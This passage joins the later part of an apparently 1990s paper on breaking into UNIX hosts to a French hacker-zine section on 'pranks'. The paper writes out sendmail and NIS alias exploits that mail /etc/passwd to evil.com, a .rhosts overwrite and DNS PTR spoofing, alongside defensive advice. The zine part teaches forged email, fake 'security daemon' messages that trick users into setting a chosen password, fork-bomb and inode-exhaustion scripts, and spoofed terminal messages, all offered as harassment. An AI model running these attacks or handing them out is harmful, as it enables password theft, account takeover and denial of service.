- You note that the rpcinfo output also showed that victim.com runs rexd.
- Like the rsh daemon, rexd processes requests of the form "please execute
- this command as that user". Unlike rshd, however, rexd does not care if
- the client host is in the hosts.equiv or .rhost files. Normally the rexd
- client program is the "on" command, but it only takes a short C program
- to send arbitrary client host and userid information to the rexd server;
- rexd will happily execute the command. For these reasons, running rexd
- is similar to having no passwords at all: all security is in the client,
- not in the server where it should be. Rexd security can be improved
- somewhat by using secure RPC.
-
- ----
-
- While looking at the output from rpcinfo, you observe that victim.com
- also seems to be a server for diskless workstations. This is evidenced
- by the presence of the bootparam service, which provides information to
- the diskless clients for booting. If you ask nicely, using
- BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
- its NIS domainname. This can be very useful when combined with the fact
- that you can get arbitrary NIS maps (such as the password file) when you
- know the NIS domainname. Here is a sample code snippet to do just that
- (bootparam is part of SATAN.)
-
- char *server;
- struct bp_whoami_arg arg; /* query */
- struct bp_whoami_res res; /* reply */
-
- /* initializations omitted... */
-
- callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
- xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
-
- printf("%s has nisdomain %s\n", server, res.domain_name);
-
- The showmount output indicated that "easy" is a diskless client of
- victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
- query:
-
- evil % bootparam victim.com easy.victim.com
- victim.com has nisdomain foo_bar
-
- ----
-
- NIS masters control the mail aliases for the NIS domain in question.
- Just like local mail alias files, you can create a mail alias that will
- execute commands when mail is sent to it (a once popular example of this
- is the "decode" alias which uudecodes mail files sent to it.) For
- instance, here you create an alias "foo", which mails the password file
- back to evil.com by simply mailing any message to it:
-
- nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
- nis-master # cd /var/yp
- nis-master # make aliases
- nis-master # echo test | mail -v foo@victim.com
-
- Hopefully attackers won't have control of your NIS master host, but even
- more hopefully the lesson is clear -- NIS is normally insecure, but if
- an attacker has control of your NIS master, then s/he effectively has
- control of the client hosts (e.g. can execute arbitrary commands).
-
- There aren't many effective defenses against NIS attacks; it is an
- insecure service that has almost no authentication between clients and
- servers. To make things worse, it seems fairly clear that arbitrary
- maps can be forced onto even master servers (e.g., it is possible to
- treat an NIS server as a client). This, obviously, would subvert the
- entire schema. If it is absolutely necessary to use NIS, choosing a
- hard to guess domainname can help slightly, but if you run diskless
- clients that are exposed to potential attackers then it is trivial for
- an attacker to defeat this simple step by using the bootparam trick to
- get the domainname. If NIS is used to propagate the password maps, then
- shadow passwords do not give additional protection because the shadow
- map is still accessible to any attacker that has root on an attacking
- host. Better is to use NIS as little as possible, or to at least
- realize that the maps can be subject to perusal by potentially hostile
- forces.
-
- Secure RPC goes a long way to diminish the threat, but it has its own
- problems, primarily in that it is difficult to administer, but also in
- that the cryptographic methods used within are not very strong. It has
- been rumored that NIS+, Sun's new network information service, fixes
- some of these problems, but until now it has been limited to running on
- Suns, and thus far has not lived up to the promise of the design.
- Finally, using packet filtering (at the very least port 111) or
- securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
- all can help.
-
- ----
-
- The portmapper only knows about RPC services. Other network services
- can be located with a brute-force method that connects to all network
- ports. Many network utilities and windowing systems listen to specific
- ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
- usually on port 6000, etc.) SATAN includes a program that scans the
- ports of a remote hosts and reports on its findings; if you run it
- against our target, you see:
-
- evil % tcpmap victim.com
- Mapping 128.128.128.1
- port 21: ftp
- port 23: telnet
- port 25: smtp
- port 37: time
- port 79: finger
- port 512: exec
- port 513: login
- port 514: shell
- port 515: printer
- port 6000: (X)
-
- This suggests that victim.com is running X windows. If not protected
- properly (via the magic cookie or xhost mechanisms), window displays can
- be captured or watched, user keystrokes may be stolen, programs executed
- remotely, etc. Also, if the target is running X and accepts a telnet to
- port 6000, that can be used for a denial of service attack, as the
- target's windowing system will often "freeze up" for a short period of
- time. One method to determine the vulnerability of an X server is to
- connect to it via the XOpenDisplay() function; if the function returns
- NULL then you cannot access the victim's display (opendisplay is part of
- SATAN):
-
- char *hostname;
-
- if (XOpenDisplay(hostname) == NULL) {
- printf("Cannot open display: %s\n", hostname);
- } else {
- printf("Can open display: %s\n", hostname);
- }
-
- evil % opendisplay victim.com:0
- Cannot open display: victim.com:0
-
- X terminals, though much less powerful than a complete UNIX system, can
- have their own security problems. Many X terminals permit unrestricted
- rsh access, allowing you to start X client programs in the victim's
- terminal with the output appearing on your own screen:
-
- evil % xhost +xvictim.victim.com
- evil % rsh xvictim.victim.com telnet victim.com -display evil.com
-
- In any case, give as much thought to your window security as your
- filesystem and network utilities, for it can compromise your system as
- surely as a "+" in your hosts.equiv or a passwordless (root) account.
-
- ----
-
- Next, you examine sendmail. Sendmail is a very complex program that has
- a long history of security problems, including the infamous "wiz"
- command (hopefully long since disabled on all machines). You can often
- determine the OS, sometimes down to the version number, of the target,
- by looking at the version number returned by sendmail. This, in turn,
- can give you hints as to how vulnerable it might be to any of the
- numerous bugs. In addition, you can see if they run the "decode" alias,
- which has its own set of problems:
-
- evil % telnet victim.com 25
- connecting to host victim.com (128.128.128.1.), port 25
- connection open
- 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
- expn decode
- 250 <"|/usr/bin/uudecode">
- quit
-
- Running the "decode" alias is a security risk -- it allows potential
- attackers to overwrite any file that is writable by the owner of that
- alias -- often daemon, but potentially any user. Consider this piece of
- mail -- this will place "evil.com" in user zen's .rhosts file if it is
- writable:
-
- evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
-
- If no home directories are known or writable, an interesting variation
- of this is to create a bogus /etc/aliases.pag file that contains an
- alias with a command you wish to execute on your target. This may work
- since on many systems the aliases.pag and aliases.dir files, which
- control the system's mail aliases, are writable to the world.
-
- evil % cat decode
- bin: "| cat /etc/passwd | mail zen@evil.com"
- evil % newaliases -oQ/tmp -oA`pwd`/decode
- evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
- evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
-
- A lot of things can be found out by just asking sendmail if an address
- is acceptable (vrfy), or what an address expands to (expn). When the
- finger or rusers services are turned off, vrfy and expn can still be
- used to identify user accounts or targets. Vrfy and expn can also be
- used to find out if the user is piping mail through any program that
- might be exploited (e.g. vacation, mail sorters, etc.). It can be a
- good idea to disable the vrfy and expn commands: in most versions, look
- at the source file srvrsmtp.c, and either delete or change the two lines
- in the CmdTab structure that have the strings "vrfy" and "expn". Sites
- without source can still disable expn and vrfy by just editing the
- sendmail executable with a binary editor and replacing "vrfy" and "expn"
- with blanks. Acquiring a recent version of sendmail (see Appendix D) is
- also an extremely good idea, since there have probably been more
- security bugs reported in sendmail than in any other UNIX program.
-
- ----
-
- As a sendmail-sendoff, there are two fairly well known bugs that should
- be checked into. The first was definitely fixed in version 5.59 from
- Berkeley; despite the messages below, for versions of sendmail previous
- to 5.59, the "evil.com" gets appended, despite the error messages, along
- with all of the typical mail headers, to the file specified:
-
- % cat evil_sendmail
- telnet victim.com 25 << EOSM
- rcpt to: /home/zen/.rhosts
- mail from: zen
- data
- random garbage
- .
- rcpt to: /home/zen/.rhosts
- mail from: zen
- data
- evil.com
- .
- quit
- EOSM
-
- evil % /bin/sh evil_sendmail
- Trying 128.128.128.1
- Connected to victim.com
- Escape character is '^]'.
- Connection closed by foreign host.
-
- evil % rlogin victim.com -l zen
- Welcome to victim.com!
- victim %
-
- The second hole, fixed only recently, permitted anyone to specify
- arbitrary shell commands and/or pathnames for the sender and/or
- destination address. Attempts to keep details secret were in vain, and
- extensive discussions in mailing lists and usenet news groups led to
- disclosure of how to exploit some versions of the bug. As with many
- UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
- since they all share a common source code tree ancestry. Space
- precludes us from discussing it fully, but a typical attack to get the
- password file might look like this:
-
- evil % telnet victim.com 25
- Trying 128.128.128.1...
- Connected to victim.com
- Escape character is '^]'.
- 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
- mail from: "|/bin/mail zen@evil.com < /etc/passwd"
- 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
- rcpt to: nosuchuser
- 550 nosuchuser... User unknown
- data
- 354 Enter mail, end with "." on a line by itself
- .
- 250 Mail accepted
- quit
- Connection closed by foreign host.
- evil %
-
- At the time of writing, version 8.6.4 of sendmail (see Appendix D for
- information on how to get this) is reportedly the only variant of
- sendmail with all of the recent security bugs fixed.
-
- Trust
- -----
-
- For our final topic of vulnerability, we'll digress from the practical
- strategy we've followed previously to go a bit more into the theoretical
- side, and briefly discuss the notion of trust. The issues and
- implications of vulnerabilities here are a bit more subtle and
- far-reaching than what we've covered before; in the context of this
- paper we use the word trust whenever there is a situation when a server
- (note that any host that allows remote access can be called a server)
- can permit a local resource to be used by a client without password
- authentication when password authentication is normally required. In
- other words, we arbitrarily limit the discussion to clients in disguise.
-
- There are many ways that a host can trust: .rhosts and hosts.equiv files
- that allow access without password verification; window servers that
- allow remote systems to use and abuse privileges; export files that
- control access via NFS, and more.
-
- Nearly all of these rely on client IP address to hostname conversion to
- determine whether or not service is to be granted. The simplest method
- uses the /etc/hosts file for a direct lookup. However, today most hosts
- use either DNS (the Domain Name Service), NIS, or both for name lookup
- service. A reverse lookup occurs when a server has an IP address (from
- a client host connecting to it) and wishes to get the corresponding
- client hostname.
-
- Although the concept of how host trust works is well understood by most
- system administrators, the _dangers_ of trust, and the _practical_
- problem it represents, irrespective of hostname impersonation, is one of
- the least understood problems we know of on the Internet. This goes far
- beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
- systems -- indeed, much of the useful services in UNIX are based on the
- concept that well known (to an administrator or user) sites are trusted
- in some way. What is not understood is how networking so tightly binds
- security between what are normally considered disjoint hosts.
-
- Any form of trust can be spoofed, fooled, or subverted, especially when
- the authority that gets queried to check the credentials of the client
- is either outside of the server's administrative domain, or when the
- trust mechanism is based on something that has a weak form of
- authentication; both are usually the case.
-
- Obviously, if the host containing the database (either NIS, DNS, or
- whatever) has been compromised, the intruder can convince the target
- host that s/he is coming from any trusted host; it is now sufficient to
- find out which hosts are trusted by the target. This task is often
- greatly helped by examining where system administrators and system
- accounts (such as root, etc.) last logged in from. Going back to our
- target, victim.com, you note that root and some other system accounts
- logged in from big.victim.com. You change the PTR record for evil.com so
- that when you attempt to rlogin in from evil.com to victim.com,
- victim.com will attempt to look up your hostname and will find what you
- placed in the record. If the record in the DNS database looks like:
-
- 1.192.192.192.in-addr.arpa IN PTR evil.com
-
- And you change it to:
-
- 1.192.192.192.in-addr.arpa IN PTR big.victim.com
-
- then, depending on how naive victim.com's system software is, victim.com
- will believe the login comes from big.victim.com, and, assuming that
- big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
- able to login without supplying a password. With NIS, it is a simple
- matter of either editing the host database on the NIS master (if this is
- controlled by the intruder) or of spoofing or forcing NIS (see
- discussion on NIS security above) to supply the target with whatever
- information you desire. Although more complex, interesting, and
- damaging attacks can be mounted via DNS, time and space don't allow
- coverage of these methods here.
-
- Two methods can be used to prevent such attacks. The first is the most
- direct, but perhaps the most impractical. If your site doesn't use any
- trust, you won't be as vulnerable to host spoofing. The other strategy
- is to use cryptographic protocols. Using the secure RPC protocol (used
- in secure NFS, NIS+, etc.) is one method; although it has been "broken"
- cryptographically, it still provides better assurance than RPC
- authentication schemes that do not use any form of encryption. Other
- solutions, both hardware (smartcards) and software (Kerberos), are being
- developed, but they are either incomplete or require changes to system
- software.
-
- Appendix B details the results of an informal survey taken from a
- variety of hosts on the Internet.
-
- Protecting the system
- ---------------------
-
- It is our hope that we have demonstrated that even some of the most
- seemingly innocuous services run can offer (sometimes unexpectedly)
- ammunition to determined system crackers. But, of course, if security
- were all that mattered, computers would never be turned on, let alone
- hooked into a network with literally millions of potential intruders.
- Rather than reiterating specific advice on what to switch on or off, we
- instead offer some general suggestions:
-
- o If you cannot turn off the finger service, consider installing a
- modified finger daemon. It is rarely necessary to reveal a user's home
- directory and the source of last login.
-
- o Don't run NIS unless it's absolutely necessary. Use NFS as little
- as possible.
-
- o Never export NFS filesystems unrestricted to the world. Try to
- export file systems read-only where possible.
-
- o Fortify and protect servers (e.g. hosts that provide a service to
- other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
- accounts on these hosts.
-
- o Examine carefully services offered by inetd and the portmapper.
- Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
- wrappers, if for no other reason than to log the sources of connections
- to your host. This adds immeasurably to the standard UNIX auditing
- features, especially with respect to network attacks. If possible, use
- the loghost mechanism of syslog to collect security-related information
- on a secure host.
-
- o Eliminate trust unless there is an absolute need for it. Trust is
- your enemy.
-
- o Use shadow passwords and a passwd command that disallows poor
- passwords. Disable or delete unused/dormant system or user accounts.
-
- o Keep abreast of current literature (see our suggested reading list and
- bibliography at the end of this paper) and security tools; communicate
- to others about security problems and incidents. At minimum, subscribe
- to the CERT mailing list and phrack magazine (plus the firewalls mailing
- list, if your site is using or thinking about installing a firewall) and
- read the usenet security newsgroups to get the latest information on
- security problems. Ignorance is the deadliest security problem we are
- aware of.
-
- o Install all vendor security patches as soon as possible, on all of
- your hosts. Examine security patch information for other vendors - many
- bugs (rdist, sendmail) are common to many UNIX variants.
-
- It is interesting to note that common solutions to security problems
- such as running Kerberos or using one-time passwords or digital tokens
- are ineffective against most of the attacks we discuss here. We
- heartily recommend the use of such systems, but be aware that they are
- _not_ a total security solution -- they are part of a larger struggle to
- defend your system.
-
- Conclusions
- -----------
-
- Perhaps none of the methods shown here are surprising; when writing this
- paper, we didn't learn very much about how to break into systems. What
- we _did_ learn was, while testing these methods out on our own systems
- and that of friendly sites, just how effective this set of methods is
- for gaining access to a typical (UNIX) Internet host. Tiring of trying
- to type these in all by hand, and desiring to keep our own systems more
- secure, we decided to implement a security tool (SATAN) that attempts to
- check remote hosts for at least some of the problems discussed here.
- The typical response, when telling people about our paper and our tool
- was something on the order of "that sounds pretty dangerous -- I hope
- you're not going to give it out to everybody. But you since you can
- trust me, may I have a copy of it?"
-
- We never set out to create a cookbook or toolkit of methods and programs
- on how to break into systems -- instead, we saw that these same methods
- were being used, every day, against ourselves and against friendly
- system administrators. We believe that by propagating information that
- normally wasn't available to those outside of the underworld, we can
- increase security by raising awareness. Trying to restrict access to
- "dangerous" security information has never seemed to be a very effective
- method for increasing security; indeed, the opposite appears to be the
- case, since the system crackers have shown little reticence to share
- their information with each other.
-
- While it is almost certain that some of the information presented here
- is new material to (aspiring) system crackers, and that some will use it
- to gain unauthorized entrance onto hosts, the evidence presented even by
- our ad hoc tests shows that there is a much larger number of insecure
- sites, simply because the system administrators don't know any better --
- they aren't stupid or slow, they simply are unable to spend the very
- little free time that they have to explore all of the security issues
- that pertain to their systems. Combine that with no easy access to this
- sort of information and you have poorly defended systems. We (modestly)
- hope that this paper will provide badly-needed data on how systems are
- broken into, and further, to explain _why_ certain steps should be taken
- to secure a system. Knowing why something is a problem is, in our
- opinion, the real key to learning and to making an informed, intelligent
- choice as to what security really means for your site.
-
- ----
-
- Appendix A:
-
- SATAN (Security Analysis Tool for Auditing Networks)
-
- Originally conceived some years ago, SATAN is actually the prototype of
- a much larger and more comprehensive vision of a security tool. In its
- current incarnation, SATAN remotely probes and reports various bugs and
- weaknesses in network services and windowing systems, as well as
- detailing as much generally useful information as possible about the
- target(s). It then processes the data with a crude filter and what
- might be termed an expert system to generate the final security
- analysis. While not particularly fast, it is extremely modular and easy
- to modify.
-
- SATAN consists of several sub-programs, each of which is an executable
- file (perl, shell, compiled C binary, whatever) that tests a host for a
- given potential weakness. Adding further test programs is as simple as
- putting an executable into the main directory with the extension ".sat";
- the driver program will automatically execute it. The driver generates
- a set of targets (using DNS and a fast version of ping together to get
- "live" targets), and then executes each of the programs over each of the
- targets. A data filtering/interpreting program then analyzes the
- output, and lastly a reporting program digests everything into a more
- readable format.
-
- The entire package, including source code and documentation, will be
- made freely available to the public, via anonymous ftp and by posting it
- to one of the numerous source code groups on the Usenet.
-
- ----
-
- Appendix B:
-
- An informal survey conducted on about a dozen Internet sites
- (educational, military, and commercial, with over 200 hosts and 40000
- accounts) revealed that on the average, close to 10 percent of a site's
- accounts had .rhosts files. These files averaged six trusted hosts
- each; however, it was not uncommon to have well over one hundred entries
- in an account's .rhosts file, and on a few occasions, the number was
- over five hundred! (This is not a record one should be proud of
- owning.) In addition, _every_ site directly on the internet (one site
- was mostly behind a firewall) trusted a user or host at another site --
- thus, the security of the site was not under the system administrators
- direct control. The larger sites, with more users and hosts, had a
- lower percentage of users with .rhosts files, but the size of .rhosts
- files increased, as well as the number of trusted off-site hosts.
-
- Although it was very difficult to verify how many of the entries were
- valid, with such hostnames such as "Makefile", "Message-Id:", and
- "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
- question the wisdom of putting a site's security in the hands of its
- users. Many users (especially the ones with larger .rhosts files)
- attempted to put shell-style comments in their .rhosts files, which most
- UNIX systems attempt to resolve as valid host names. Unfortunately, an
- attacker can then use the DNS and NIS hostname spoofing techniques
- discussed earlier to set their hostname to "#" and freely log in. This
- puts a great many sites at risk (at least one major vendor ships their
- systems with comments in their /etc/hosts.equiv files.)
-
- You might think that these sites were not typical, and, as a matter of
- fact, they weren't. Virtually all of the administrators knew a great
- deal about security and write security programs for a hobby or
- profession, and many of the sites that they worked for did either
- security research or created security products. We can only guess at
- what a "typical" site might look like.
-
- ----
-
- Appendix C:
-
- After receiving mail from a site that had been broken into from one of
- our systems, an investigation was started. In time, we found that the
- intruder was working from a list of ".com" (commercial) sites, looking
- for hosts with easy-to steal password files. In this case,
- "easy-to-steal" referred to sites with a guessable NIS domainname and an
- accessible NIS server. Not knowing how far the intruder had gotten, it
- looked like a good idea to warn the sites that were in fact vulnerable
- to password file theft. Of the 656 hosts in the intruder's hit list, 24
- had easy-to-steal password files -- about one in twenty-five hosts! One
- third of these files contained at least one password-less account with
- an interactive shell. With a grand total of 1594 password-file entries,
- a ten-minute run of a publically-available password cracker (Crack)
- revealed more than 50 passwords, using nothing but a low-end Sun
- workstation. Another 40 passwords were found within the next 20
- minutes; and a root password was found in just over an hour. The result
- after a few days of cracking: five root passwords found, 19 out of 24
- password files (eighty percent) with at least one known password, and
- 259 of 1594 (one in six) passwords guessed.
-
- ----
-
- Appendix D:
-
- How to get some free security resources on the Internet
-
- Mailing lists:
-
- o The CERT (Computer Emergency Response Team) advisory mailing list.
- Send e-mail to cert@cert.org, and ask to be placed on their mailing
- list.
-
- o The Phrack newsletter. Send an e-mail message to
- phrack@well.sf.ca.us and ask to be added to the list.
-
- o The Firewalls mailing list. Send the following line to
- majordomo@greatcircle.com:
-
- subscribe firewalls
-
- o Computer Underground Digest. Send e-mail to
- tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.
-
- Free Software:
-
- COPS (Computer Oracle and Password System) is available via anonymous
- ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
-
- The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
- in pub/security.
-
- The latest version of berkeley sendmail is available via anonymous ftp
- from ftp.cs.berkeley.edu, in ucb/sendmail.
-
- Sources for ftpd and many other network utilities can be found in
- ftp.uu.net, in packages/bsd-sources.
-
- Source for ISS (Internet Security Scanner), a tool that remotely scans
- for various network vulnerabilities, is available via anonymous ftp from
- ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
-
- Securelib is available via anonymous ftp from ftp.uu.net, in
- usenet/comp.sources.misc/volume36/securelib.
-
- ----
-
- Bibliography:
-
- Baldwin, Robert W., Rule Based Analysis of Computer Security,
- Massachusetts Institute of Technology, June 1987.
-
- Bellovin, Steve, Using the Domain Name System for System Break-ins,
- 1992 (unpublished).
-
- Massachusetts Institute of Technology, X Window System Protocol,
- Version 11, 1990.
-
- Shimomura, Tsutomu, private communication.
-
- Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
-
- ----
-
- Suggested reading:
-
- Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
- Computer Communication Review 19 (2), 1989; a comment by Stephen
- Kent appears in volume 19 (3), 1989.
-
- Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security",
- O'Reilly and Associates, Inc., 1992.
-
- Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
- Study: Network Information Service", Computer Communication Review
- 22 (5) 1992.
-
- Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
- Four, Issue Forty-Three, File 14 of 27.
-
- Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
- 1993.
-
- Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
- Protocal", Purdue University, August 1993.
-
- Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
- 27 (8), 1984.
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.12
-
- o/~ Paranoia ! o/~ Paranoia o/~
- ---===***###> Plaisanter sous Unix <###***===---
- o/~ They are Back ! o/~
-
- Vous vous etes toujours demandé comment jouer des farces sous Unix,
- comment foutres les boules a vos potes, a votre administrateur, jouer au con
- avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre
- petit ++N-Phile. Amusez vous bien !
-
- [ nota : tout ce qui est tapé au clavier est précédé de ">>>" ]
-
- > Mailer sous un autre nom:
- ========================
- Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix
- est transporte de machine en machine par "sendmail" qui écoute les messages des
- autres mailers ou de ses clients sur le port TCP numéro 25.
-
- DaubeNet {101} grep smtp /etc/services
- smtp 25/tcp mail
-
- Donc il suffit de se connecter la bas et de respecter le protocole SMTP
- (Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
- mail qui pourrait venir de n'importe ou.
-
- ----------------------
- DaubeNet {102} >>> telnet localhost 25
- Trying 127.0.0.1...
- Connected to univ-anon.fr.
- Escape character is '^]'.
- 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
- 220 ESMTP spoken here
- >>>help
- 214-Commands:
- 214- HELO EHLO MAIL RCPT DATA
- 214- RSET NOOP QUIT HELP VRFY
- 214- EXPN VERB
- 214-For more info use "HELP <topic>".
- 214-To report bugs in the implementation send email to
- 214- sendmail@CS.Berkeley.EDU.
- 214-For local information send email to Postmaster at your site.
- 214 End of HELP info
- >>>help helo
- 214-HELO <hostname>
- 214- Introduce yourself.
- 214 End of HELP info
- >>>help mail
- 214-MAIL FROM: <sender>
- 214- Specifies the sender.
- 214 End of HELP info
- >>>help rcpt
- 214-RCPT TO: <recipient>
- 214- Specifies the recipient. Can be used any number of times.
- 214 End of HELP info
- >>>help data
- 214-DATA
- 214- Following text is collected as the message.
- 214- End with a single dot.
- 214 End of HELP info
- >>>help quit
- 214-QUIT
- 214- Exit sendmail (SMTP).
- 214 End of HELP info
- >>>quit
- 221 DaubeNet closing connection
- Connection closed by foreign host.
- ----------------------
-
- Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
- un mail. C'est très facile mais il y a une bidouille qu'il faut connaitre et
- qui vous trahi si vous ne la connaissez pas.
-
- ----------------------
- DaubeNet {103} >>> telnet localhost 25
- Trying 127.0.0.1...
- Connected to univ-anon.fr.
- Escape character is '^]'.
- 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
- 220 ESMTP spoken here
- >>>helo ducon.fbi.com
- 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
- >>>mail from: root@ducon.fbi.com
- 250 root@ducon.fbi.com... Sender ok
- >>>rcpt to: fred
- 250 fred... Recipient ok
- >>>data
- 354 Enter mail, end with "." on a line by itself
- >>>
- >>>Please, would you stop playing with my Unix system otherwise i'll
- >>>send a wet operation commando to your university.
- >>>
- >>>Nigel X.
- >>>System Administrator at FBI Inc.
- >>>root@fbi.com
- >>>.
- 250 DAA00299 Message accepted for delivery
- >>>quit
- 221 DaubeNet closing connection
- Connection closed by foreign host.
- ----------------------
-
- Haha, ca y est, on a envoyé notre petite bidouille et le mec va avoir les
- jetons de sa vie:
-
- ----------------------
- DaubeNet {104} >>> mail
- Mail version 5.5 6/1/90. Type ? for help.
- "/var/mail/fred": 1 message 1 new
- >N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508
- & >>>1
- Message 1:
- From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
- From: root@ducon.fbi.com
- Apparently-To: fred [ * ]
-
- Please, would you stop playing with my Unix system otherwise i'll
- send a wet operation commando to your university.
-
- Nigel X.
- System Administrator at FBI Inc.
- root@fbi.com
-
- & >>>d
- & >>>q
- ----------------------
-
- Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astérisque entre
- crochets : C'est marqué: "Apparently-To: " arghhh... Ca fait vraiment pas
- serieux n'est ce pas?
- C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
- Et en parlant de bidouille, la voici...
-
- ----------------------
- DaubeNet {105} >>> telnet localhost 25
- Trying 127.0.0.1...
- Connected to univ-anon.fr.
- Escape character is '^]'.
- 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
- 220 ESMTP spoken here
- >>>helo
- 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
- >>>mail from: root@fbi.com
- 250 root@fbi.com... Sender ok
- >>>rcpt to: fred
- 250 fred... Recipient ok
- >>>data
- 354 Enter mail, end with "." on a line by itself
- >>>To: fred@univ-anon.fr [ * ]
- >>>
- >>>Good afternoon,
- >>>
- >>> Could you please stop playing with my unix system otherwise i'll
- >>>be forced to send one of our wet operations' commando to execute you.
- >>>
- >>>Nigel X, System Administrator at Fbi Inc.
- >>>.
- 250 DAA00307 Message accepted for delivery
- >>>quit
- 221 DaubeNet closing connection
- Connection closed by foreign host.
- ----------------------
-
- Vous regarderez attentivement la premiere ligne tapée après le DATA.
- C'est un "To: " suivi de l'adresse a qui on envoie...
- Et voila le résultat:
-
- ----------------------
- DaubeNet {106} >>> mail
- Mail version 5.5 6/1/90. Type ? for help.
- "/var/mail/fred": 1 message 1 new
- >N 1 root@fbi.com Thu Sep 15 03:57 14/509
- & >>>1
- Message 1:
- From root@fbi.com Thu Sep 15 03:57:41 1994
- From: root@fbi.com
- To: fred@univ-anon.fr
-
- Good afternoon,
-
- Could you please stop playing with my unix system otherwise i'll
- be forced to send one of our wet operations' commando to execute you.
-
- Nigel X, System Administrator at Fbi Inc.
-
- & >>>d
- & >>>q
- DaubeNet {107} exit
- ----------------------
-
- C'est beau non la technique... ;)
-
- Grace à cela vous pouvez commencer à lancer la terreur sur votre réseau.
-
- Hacking Psychology:
- ==================
- Les utilisateurs sont par définition très soumis (et c'est pour cela
- que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
- lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
- qui peut faire du faux mail...
-
- Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
- completement flooder toute la boite aux lettre de votre/vos victime(s).
-
- Mais il y a plus interressant.
- Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
- disant:
- -----
- * This is and automated mailing : don't reply *
-
- We have found that your password is insecure. You should change this
- otherwise your account will be disabled.
-
- Please use the password "ItG-4v3" instead.
-
- Thank you.
- Security Daemon.
- -----
- Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
- comptes. Une fois, j'ai réussi même à faire changer le mot de passe de
- *l'admin* !!!!! Quel con, il obéit à des packages de sécurité qu'il n'a même
- pas installé. AHahaha !
-
- Foutre un systeme sur les genoux:
- ================================
- Pour cela il y a des petits trucs tout con à faire si vous n'avez pas
- d'accounting:
- créez un petit script "toto" de ce type:
- #!/bin/sh
- mkdir ./-fuck
- cp ./toto ./-fuck/toto
- cd ./-fuck
- ./toto
-
- Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
- par manque d'inode.
-
- On peut aussi faire dans le meme genre un fichier "foo":
- #!/bin/csh
- ./foo &
- ./foo &
- ./foo &
-
- hehe, effet tout aussi garanti...
-
- On peut même mixer les deux !
-
- Les messages fantomes:
- =====================
- Vous savez, quand vous faites un write la personne à qui il est déstiné
- recoit:
- Message from <luser> at/...
- Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
- non??
- Eh bien c'est possible:
- Il faut savoir comment ca marche. Chaque utilisateur loggé a au moins un
- terminal. Ce terminal est représenté dans le système Unix comme un nom de
- périphérique du type: /dev/ttyXX ou XX est généralement un nombre ou une lettre
- et un nombre.
- Bref, c'est la dessus qu'écrit la commande write.
- Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
- écriture sur ce périphérique. Sur les anciens système, l'appel système
- vhangup() n'éxistait pas et on pouvait donc se connecter, regarder les
- terminaux disponibles (nons attribués à des users donc en lecture et ecriture
- pour tout le monde) et faire un cat dessus comme ceci:
- $ cat >/dev/tty02
- ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
- par ce terminal.
- Ensuite, préparer a coté le :
-
- Message from root at...
- Veuillez changer immédiatement votre mot de passe en: "TuY5;tK"
- Merci. Votre administrateur système.
- <EOT>
-
- Fun isn't it?
-
- S'amuser avec les émulateurs de terminaux:
- =========================================
- Vous savez que par exemple zmodem envoie une chaine de caractère qui
- lance automatiquement Zmodem en reception du cote de l'émulateur de terminaux.
- C'est très interressant car on peut faire appeler intempestivement Zmodem dans
- l'émulateur si telle ou telle personne en message on utilise un émulateur de
- terminaux.
-
- Il suffit d'enregistrer la séquence envoyée par Zmodem pour déclancher l'appel
- de Zmodem et hop, bienvenue en enfer !
-
